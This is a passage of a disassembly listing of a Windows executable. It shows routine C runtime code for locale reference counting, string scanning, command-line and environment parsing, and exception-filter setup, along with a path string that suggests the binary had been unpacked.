; ---------------------------------------------------------------------------
loc_4085B7: ; CODE XREF: sub_408490+115�j
push dword_410CA8
call dword_40D16C ; InterlockedDecrement
test eax, eax
jnz short loc_4085DA
mov eax, dword_410CA8
cmp eax, offset dword_410880
jz short loc_4085DA
push eax
call sub_40405A
pop ecx
loc_4085DA: ; CODE XREF: sub_408490+135�j
; sub_408490+141�j
mov dword_410CA8, ebx
push ebx
call edi ; InterlockedIncrement
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4085F1
jmp short loc_408621
sub_408490 endp
; =============== S U B R O U T I N E =======================================
sub_4085F1 proc near ; CODE XREF: sub_408490+15A�p
; DATA XREF: seg001:0040E678�o
push 0Dh
call sub_405049
pop ecx
retn
sub_4085F1 endp
; ---------------------------------------------------------------------------
jmp short loc_408621
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408490
loc_4085FC: ; CODE XREF: sub_408490+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_408621
cmp ebx, offset dword_410880
jz short loc_408610
push ebx
call sub_40405A
pop ecx
loc_408610: ; CODE XREF: sub_408490+177�j
call sub_403F8F
mov dword ptr [eax], 16h
jmp short loc_408621
; ---------------------------------------------------------------------------
loc_40861D: ; CODE XREF: sub_408490+30�j
and [ebp+var_20], 0
loc_408621: ; CODE XREF: sub_408490+45�j
; sub_408490+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408490
; =============== S U B R O U T I N E =======================================
sub_40862A proc near ; CODE XREF: sub_408B89+C�p
; sub_408BE6+D�p ...
cmp dword_413BB8, 0
jnz short loc_408645
push 0FFFFFFFDh
call sub_408490
pop ecx
mov dword_413BB8, 1
loc_408645: ; CODE XREF: sub_40862A+7�j
xor eax, eax
retn
sub_40862A endp
; =============== S U B R O U T I N E =======================================
sub_408648 proc near ; CODE XREF: sub_406500+E8�p
; sub_40889A+31�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_4086CB
cmp eax, offset off_411248
jz short loc_4086CB
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_4086CB
cmp [eax], ebp
jnz short loc_4086CB
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_408692
cmp [eax], ebp
jnz short loc_408692
push eax
call sub_40405A
push dword ptr [esi+0BCh]
call sub_40B4F8
pop ecx
pop ecx
loc_408692: ; CODE XREF: sub_408648+31�j
; sub_408648+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_4086B3
cmp [eax], ebp
jnz short loc_4086B3
push eax
call sub_40405A
push dword ptr [esi+0BCh]
call sub_40B4B8
pop ecx
pop ecx
loc_4086B3: ; CODE XREF: sub_408648+52�j
; sub_408648+56�j
push dword ptr [esi+0B0h]
call sub_40405A
push dword ptr [esi+0BCh]
call sub_40405A
pop ecx
pop ecx
loc_4086CB: ; CODE XREF: sub_408648+12�j
; sub_408648+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_408719
cmp [eax], ebp
jnz short loc_408719
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_40405A
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_40405A
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_40405A
push dword ptr [esi+0C0h]
call sub_40405A
add esp, 10h
loc_408719: ; CODE XREF: sub_408648+8B�j
; sub_408648+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_411188
jz short loc_40873F
cmp [eax+0B4h], ebp
jnz short loc_40873F
push eax
call sub_40B328
push dword ptr [edi]
call sub_40405A
pop ecx
pop ecx
loc_40873F: ; CODE XREF: sub_408648+DE�j
; sub_408648+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_408745: ; CODE XREF: sub_408648+132�j
cmp dword ptr [edi-8], offset dword_410DA8
jz short loc_40875F
mov eax, [edi]
cmp eax, ebp
jz short loc_40875F
cmp [eax], ebp
jnz short loc_40875F
push eax
call sub_40405A
pop ecx
loc_40875F: ; CODE XREF: sub_408648+104�j
; sub_408648+10A�j ...
cmp [edi-4], ebp
jz short loc_408776
mov eax, [edi+4]
cmp eax, ebp
jz short loc_408776
cmp [eax], ebp
jnz short loc_408776
push eax
call sub_40405A
pop ecx
loc_408776: ; CODE XREF: sub_408648+11A�j
; sub_408648+121�j ...
add edi, 10h
dec ebx
jnz short loc_408745
push esi
call sub_40405A
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_408648 endp
; =============== S U B R O U T I N E =======================================
sub_408788 proc near ; CODE XREF: sub_4063B2+9E�p
; sub_40889A+12�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, dword_40D160
push esi
call edi ; InterlockedIncrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_4087A6
push eax
call edi ; InterlockedIncrement
loc_4087A6: ; CODE XREF: sub_408788+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_4087B3
push eax
call edi ; InterlockedIncrement
loc_4087B3: ; CODE XREF: sub_408788+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_4087C0
push eax
call edi ; InterlockedIncrement
loc_4087C0: ; CODE XREF: sub_408788+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_4087CD
push eax
call edi ; InterlockedIncrement
loc_4087CD: ; CODE XREF: sub_408788+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_4087D3: ; CODE XREF: sub_408788+71�j
cmp dword ptr [ebx-8], offset dword_410DA8
jz short loc_4087E5
mov eax, [ebx]
test eax, eax
jz short loc_4087E5
push eax
call edi ; InterlockedIncrement
loc_4087E5: ; CODE XREF: sub_408788+52�j
; sub_408788+58�j
cmp dword ptr [ebx-4], 0
jz short loc_4087F5
mov eax, [ebx+4]
test eax, eax
jz short loc_4087F5
push eax
call edi ; InterlockedIncrement
loc_4087F5: ; CODE XREF: sub_408788+61�j
; sub_408788+68�j
add ebx, 10h
dec ebp
jnz short loc_4087D3
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedIncrement
pop edi
pop esi
pop ebp
pop ebx
retn
sub_408788 endp
; =============== S U B R O U T I N E =======================================
sub_40880E proc near ; CODE XREF: sub_406500+CC�p
; sub_40889A+1D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_408896
push ebx
push ebp
push edi
mov edi, dword_40D16C
push esi
call edi ; InterlockedDecrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_408830
push eax
call edi ; InterlockedDecrement
loc_408830: ; CODE XREF: sub_40880E+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_40883D
push eax
call edi ; InterlockedDecrement
loc_40883D: ; CODE XREF: sub_40880E+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_40884A
push eax
call edi ; InterlockedDecrement
loc_40884A: ; CODE XREF: sub_40880E+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_408857
push eax
call edi ; InterlockedDecrement
loc_408857: ; CODE XREF: sub_40880E+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_40885D: ; CODE XREF: sub_40880E+75�j
cmp dword ptr [ebx-8], offset dword_410DA8
jz short loc_40886F
mov eax, [ebx]
test eax, eax
jz short loc_40886F
push eax
call edi ; InterlockedDecrement
loc_40886F: ; CODE XREF: sub_40880E+56�j
; sub_40880E+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_40887F
mov eax, [ebx+4]
test eax, eax
jz short loc_40887F
push eax
call edi ; InterlockedDecrement
loc_40887F: ; CODE XREF: sub_40880E+65�j
; sub_40880E+6C�j
add ebx, 10h
dec ebp
jnz short loc_40885D
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedDecrement
pop edi
pop ebp
pop ebx
loc_408896: ; CODE XREF: sub_40880E+7�j
mov eax, esi
pop esi
retn
sub_40880E endp
; =============== S U B R O U T I N E =======================================
sub_40889A proc near ; CODE XREF: sub_4088D8+54�p
test edi, edi
jz short loc_4088D5
test eax, eax
jz short loc_4088D5
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_4088D1
push edi
mov [eax], edi
call sub_408788
test esi, esi
pop ecx
jz short loc_4088D1
push esi
call sub_40880E
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4088D1
cmp esi, offset dword_410DB0
jz short loc_4088D1
push esi
call sub_408648
pop ecx
loc_4088D1: ; CODE XREF: sub_40889A+D�j
; sub_40889A+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4088D5: ; CODE XREF: sub_40889A+2�j
; sub_40889A+6�j
xor eax, eax
retn
sub_40889A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088D8 proc near ; CODE XREF: sub_4048C8+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E680
call __SEH_prolog4
call sub_4064E8
mov esi, eax
mov eax, dword_410DA4
test [esi+70h], eax
jz short loc_408917
cmp dword ptr [esi+6Ch], 0
jz short loc_408917
call sub_4064E8
mov esi, [eax+6Ch]
loc_408903: ; CODE XREF: sub_4088D8+68�j
test esi, esi
jnz short loc_40890F
push 20h
call sub_40422F
pop ecx
loc_40890F: ; CODE XREF: sub_4088D8+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_408917: ; CODE XREF: sub_4088D8+1B�j
; sub_4088D8+21�j
push 0Ch
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, off_410E88
call sub_40889A
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408942
jmp short loc_408903
sub_4088D8 endp
; =============== S U B R O U T I N E =======================================
sub_408942 proc near ; CODE XREF: sub_4088D8+63�p
; DATA XREF: seg001:0040E698�o
push 0Ch
call sub_405049
pop ecx
mov esi, [ebp-1Ch]
retn
sub_408942 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40894E proc near ; CODE XREF: sub_40497F+9B�p
; sub_40497F+AD�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_4048C8
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_4089C1
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_40898D
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40AB1F
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_40899A
; ---------------------------------------------------------------------------
loc_40898D: ; CODE XREF: sub_40894E+29�j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_40899A: ; CODE XREF: sub_40894E+3D�j
test eax, eax
jz short loc_4089AD
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_408A54
; ---------------------------------------------------------------------------
loc_4089AD: ; CODE XREF: sub_40894E+4E�j
; sub_40894E+EA�j
cmp [ebp+var_C], 0
jz short loc_4089BA
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4089BA: ; CODE XREF: sub_40894E+63�j
mov eax, ebx
jmp loc_408A61
; ---------------------------------------------------------------------------
loc_4089C1: ; CODE XREF: sub_40894E+1D�j
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_4089FE
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40A886
test eax, eax
pop ecx
pop ecx
jz short loc_4089FE
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_408A13
; ---------------------------------------------------------------------------
loc_4089FE: ; CODE XREF: sub_40894E+7D�j
; sub_40894E+9C�j
call sub_403F8F
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_408A13: ; CODE XREF: sub_40894E+AE�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40B0ED
add esp, 24h
test eax, eax
jz loc_4089AD
cmp eax, 1
jnz short loc_408A49
movzx eax, [ebp+var_8]
jmp short loc_408A54
; ---------------------------------------------------------------------------
loc_408A49: ; CODE XREF: sub_40894E+F3�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_408A54: ; CODE XREF: sub_40894E+5A�j
; sub_40894E+F9�j
cmp [ebp+var_C], 0
jz short loc_408A61
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_408A61: ; CODE XREF: sub_40894E+6E�j
; sub_40894E+10A�j
pop esi
pop ebx
leave
retn
sub_40894E endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_408A86
loc_408A70: ; CODE XREF: sub_408A86+19�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_408A86
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_408A86 proc near ; CODE XREF: sub_404AB0+74�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00408A70 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_408AAD
loc_408A98: ; CODE XREF: sub_408A86+25�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_408A70
test cl, cl
jz short loc_408AF6
test edx, 3
jnz short loc_408A98
loc_408AAD: ; CODE XREF: sub_408A86+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_408AB8: ; CODE XREF: sub_408A86+5D�j
; sub_408A86+6C�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_408AFA
and eax, 81010100h
jz short loc_408AB8
and eax, 1010100h
jnz short loc_408AF4
and esi, 80000000h
jnz short loc_408AB8
loc_408AF4: ; CODE XREF: sub_408A86+64�j
; sub_408A86+7D�j ...
pop esi
pop edi
loc_408AF6: ; CODE XREF: sub_408A86+1D�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408AFA: ; CODE XREF: sub_408A86+56�j
mov eax, [edx-4]
cmp al, bl
jz short loc_408B37
test al, al
jz short loc_408AF4
cmp ah, bl
jz short loc_408B30
test ah, ah
jz short loc_408AF4
shr eax, 10h
cmp al, bl
jz short loc_408B29
test al, al
jz short loc_408AF4
cmp ah, bl
jz short loc_408B22
test ah, ah
jz short loc_408AF4
jmp short loc_408AB8
; ---------------------------------------------------------------------------
loc_408B22: ; CODE XREF: sub_408A86+94�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408B29: ; CODE XREF: sub_408A86+8C�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408B30: ; CODE XREF: sub_408A86+81�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408B37: ; CODE XREF: sub_408A86+79�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_408A86 endp
; =============== S U B R O U T I N E =======================================
sub_408B3E proc near ; DATA XREF: sub_408B7B�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_408B76
cmp dword ptr [eax+10h], 3
jnz short loc_408B76
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_408B71
cmp eax, 19930521h
jz short loc_408B71
cmp eax, 19930522h
jz short loc_408B71
cmp eax, 1994000h
jnz short loc_408B76
loc_408B71: ; CODE XREF: sub_408B3E+1C�j
; sub_408B3E+23�j ...
call sub_40773B
loc_408B76: ; CODE XREF: sub_408B3E+C�j
; sub_408B3E+12�j ...
xor eax, eax
retn 4
sub_408B3E endp
; =============== S U B R O U T I N E =======================================
sub_408B7B proc near ; DATA XREF: seg001:0040D23C�o
push offset sub_408B3E
call dword_40D120 ; SetUnhandledExceptionFilter
xor eax, eax
retn
sub_408B7B endp
; =============== S U B R O U T I N E =======================================
sub_408B89 proc near ; CODE XREF: seg001:loc_404CF1�p
push esi
push edi
xor edi, edi
cmp dword_413BB8, edi
jnz short loc_408B9A
call sub_40862A
loc_408B9A: ; CODE XREF: sub_408B89+A�j
mov esi, dword_413BA4
test esi, esi
jnz short loc_408BA9
mov esi, offset byte_40D9D7
loc_408BA9: ; CODE XREF: sub_408B89+19�j
; sub_408B89+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_408BB7
test al, al
jz short loc_408BE1
test edi, edi
jz short loc_408BDB
loc_408BB7: ; CODE XREF: sub_408B89+24�j
cmp al, 22h
jnz short loc_408BC4
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_408BC4: ; CODE XREF: sub_408B89+30�j
movzx eax, al
push eax
call sub_40B671
test eax, eax
pop ecx
jz short loc_408BD3
inc esi
loc_408BD3: ; CODE XREF: sub_408B89+47�j
inc esi
jmp short loc_408BA9
; ---------------------------------------------------------------------------
loc_408BD6: ; CODE XREF: sub_408B89+56�j
cmp al, 20h
ja short loc_408BE1
inc esi
loc_408BDB: ; CODE XREF: sub_408B89+2C�j
mov al, [esi]
test al, al
jnz short loc_408BD6
loc_408BE1: ; CODE XREF: sub_408B89+28�j
; sub_408B89+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_408B89 endp
; =============== S U B R O U T I N E =======================================
sub_408BE6 proc near ; CODE XREF: seg001:loc_404CCE�p
push ebx
xor ebx, ebx
cmp dword_413BB8, ebx
push esi
push edi
jnz short loc_408BF8
call sub_40862A
loc_408BF8: ; CODE XREF: sub_408BE6+B�j
mov esi, dword_411414
xor edi, edi
cmp esi, ebx
jnz short loc_408C1C
loc_408C04: ; CODE XREF: sub_408BE6+51�j
or eax, 0FFFFFFFFh
jmp loc_408CA7
; ---------------------------------------------------------------------------
loc_408C0C: ; CODE XREF: sub_408BE6+3A�j
cmp al, 3Dh
jz short loc_408C11
inc edi
loc_408C11: ; CODE XREF: sub_408BE6+28�j
push esi
call sub_404F20
pop ecx
lea esi, [esi+eax+1]
loc_408C1C: ; CODE XREF: sub_408BE6+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_408C0C
push 4
inc edi
push edi
call sub_409363
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov dword_4113F0, edi
jz short loc_408C04
mov esi, dword_411414
push ebp
jmp short loc_408C82
; ---------------------------------------------------------------------------
loc_408C42: ; CODE XREF: sub_408BE6+9E�j
push esi
call sub_404F20
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_408C80
push 1
push ebp
call sub_409363
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_408CAB
push esi
push ebp
push eax
call sub_404EAF
add esp, 0Ch
test eax, eax
jz short loc_408C7D
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404D8F
add esp, 14h
loc_408C7D: ; CODE XREF: sub_408BE6+88�j
add edi, 4
loc_408C80: ; CODE XREF: sub_408BE6+69�j
add esi, ebp
loc_408C82: ; CODE XREF: sub_408BE6+5A�j
cmp [esi], bl
jnz short loc_408C42
push dword_411414
call sub_40405A
mov dword_411414, ebx
mov [edi], ebx
mov dword_413BAC, 1
xor eax, eax
loc_408CA5: ; CODE XREF: sub_408BE6+D9�j
pop ecx
pop ebp
loc_408CA7: ; CODE XREF: sub_408BE6+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408CAB: ; CODE XREF: sub_408BE6+79�j
push dword_4113F0
call sub_40405A
mov dword_4113F0, ebx
or eax, 0FFFFFFFFh
jmp short loc_408CA5
sub_408BE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408CC1 proc near ; CODE XREF: sub_408E59+55�p
; sub_408E59+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_408CE7
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_408CE7: ; CODE XREF: sub_408CC1+1B�j
mov [ebp+var_4], eax
loc_408CEA: ; CODE XREF: sub_408CC1+7E�j
; sub_408CC1+88�j
cmp byte ptr [esi], 22h
jnz short loc_408CFF
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_408D3B
; ---------------------------------------------------------------------------
loc_408CFF: ; CODE XREF: sub_408CC1+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_408D0D
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_408D0D: ; CODE XREF: sub_408CC1+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_40B671
test eax, eax
pop ecx
jz short loc_408D31
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_408D30
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_408D30: ; CODE XREF: sub_408CC1+63�j
inc esi
loc_408D31: ; CODE XREF: sub_408CC1+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_408D6D
loc_408D3B: ; CODE XREF: sub_408CC1+3C�j
cmp [ebp+var_4], 0
jnz short loc_408CEA
cmp bl, 20h
jz short loc_408D4B
cmp bl, 9
jnz short loc_408CEA
loc_408D4B: ; CODE XREF: sub_408CC1+83�j
test edx, edx
jz short loc_408D53
mov byte ptr [edx-1], 0
loc_408D53: ; CODE XREF: sub_408CC1+8C�j
; sub_408CC1+AD�j
and [ebp+var_4], 0
loc_408D57: ; CODE XREF: sub_408CC1+183�j
cmp byte ptr [esi], 0
jz loc_408E49
loc_408D60: ; CODE XREF: sub_408CC1+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_408D6A
cmp al, 9
jnz short loc_408D70
loc_408D6A: ; CODE XREF: sub_408CC1+A3�j
inc esi
jmp short loc_408D60
; ---------------------------------------------------------------------------
loc_408D6D: ; CODE XREF: sub_408CC1+78�j
dec esi
jmp short loc_408D53
; ---------------------------------------------------------------------------
loc_408D70: ; CODE XREF: sub_408CC1+A7�j
cmp byte ptr [esi], 0
jz loc_408E49
cmp [ebp+arg_0], 0
jz short loc_408D88
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_408D88: ; CODE XREF: sub_408CC1+BC�j
inc dword ptr [ecx]
loc_408D8A: ; CODE XREF: sub_408CC1+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_408D93
; ---------------------------------------------------------------------------
loc_408D91: ; CODE XREF: sub_408CC1+D5�j
inc esi
inc ecx
loc_408D93: ; CODE XREF: sub_408CC1+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_408D91
cmp byte ptr [esi], 22h
jnz short loc_408DC3
test cl, 1
jnz short loc_408DC1
cmp [ebp+var_4], 0
jz short loc_408DB4
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_408DB4
mov esi, eax
jmp short loc_408DC1
; ---------------------------------------------------------------------------
loc_408DB4: ; CODE XREF: sub_408CC1+E5�j
; sub_408CC1+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_408DC1: ; CODE XREF: sub_408CC1+DF�j
; sub_408CC1+F1�j
shr ecx, 1
loc_408DC3: ; CODE XREF: sub_408CC1+DA�j
test ecx, ecx
jz short loc_408DD9
loc_408DC7: ; CODE XREF: sub_408CC1+113�j
dec ecx
test edx, edx
jz short loc_408DD0
mov byte ptr [edx], 5Ch
inc edx
loc_408DD0: ; CODE XREF: sub_408CC1+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_408DC7
mov [ebp+arg_4], edx
loc_408DD9: ; CODE XREF: sub_408CC1+104�j
mov al, [esi]
test al, al
jz short loc_408E34
cmp [ebp+var_4], 0
jnz short loc_408DED
cmp al, 20h
jz short loc_408E34
cmp al, 9
jz short loc_408E34
loc_408DED: ; CODE XREF: sub_408CC1+122�j
test ebx, ebx
jz short loc_408E2E
test edx, edx
movsx eax, al
push eax
jz short loc_408E1C
call sub_40B671
test eax, eax
pop ecx
jz short loc_408E10
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_408E10: ; CODE XREF: sub_408CC1+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_408E29
; ---------------------------------------------------------------------------
loc_408E1C: ; CODE XREF: sub_408CC1+136�j
call sub_40B671
test eax, eax
pop ecx
jz short loc_408E29
inc esi
inc dword ptr [edi]
loc_408E29: ; CODE XREF: sub_408CC1+159�j
; sub_408CC1+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_408E2E: ; CODE XREF: sub_408CC1+12E�j
inc esi
jmp loc_408D8A
; ---------------------------------------------------------------------------
loc_408E34: ; CODE XREF: sub_408CC1+11C�j
; sub_408CC1+126�j ...
test edx, edx
jz short loc_408E3F
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_408E3F: ; CODE XREF: sub_408CC1+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_408D57
; ---------------------------------------------------------------------------
loc_408E49: ; CODE XREF: sub_408CC1+99�j
; sub_408CC1+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_408E55
and dword ptr [eax], 0
loc_408E55: ; CODE XREF: sub_408CC1+18F�j
inc dword ptr [ecx]
leave
retn
sub_408CC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E59 proc near ; CODE XREF: seg001:00404CBD�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp dword_413BB8, ebx
push esi
push edi
jnz short loc_408E71
call sub_40862A
loc_408E71: ; CODE XREF: sub_408E59+11�j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push ebx
mov byte_411D44, bl
call dword_40D0E0 ; GetModuleFileNameA
mov eax, dword_413BA4
cmp eax, ebx
mov off_411400, esi
jz short loc_408E9F
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_408EA2
loc_408E9F: ; CODE XREF: sub_408E59+3D�j
mov [ebp+var_4], esi
loc_408EA2: ; CODE XREF: sub_408E59+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_408CC1
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_408F0A
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_408F0A
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_408F0A
push eax
call sub_409323
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_408F0A
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_408CC1
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov dword_4113E4, eax
mov dword_4113E8, esi
xor eax, eax
jmp short loc_408F0D
; ---------------------------------------------------------------------------
loc_408F0A: ; CODE XREF: sub_408E59+65�j
; sub_408E59+6D�j ...
or eax, 0FFFFFFFFh
loc_408F0D: ; CODE XREF: sub_408E59+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_408E59 endp
; =============== S U B R O U T I N E =======================================
sub_408F12 proc near ; CODE XREF: seg001:00404CB3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_411D48
push ebx
push ebp
push esi
push edi
mov edi, dword_40D1A0
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_408F5B
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_408F42
mov dword_411D48, 1
jmp short loc_408F64
; ---------------------------------------------------------------------------
loc_408F42: ; CODE XREF: sub_408F12+22�j
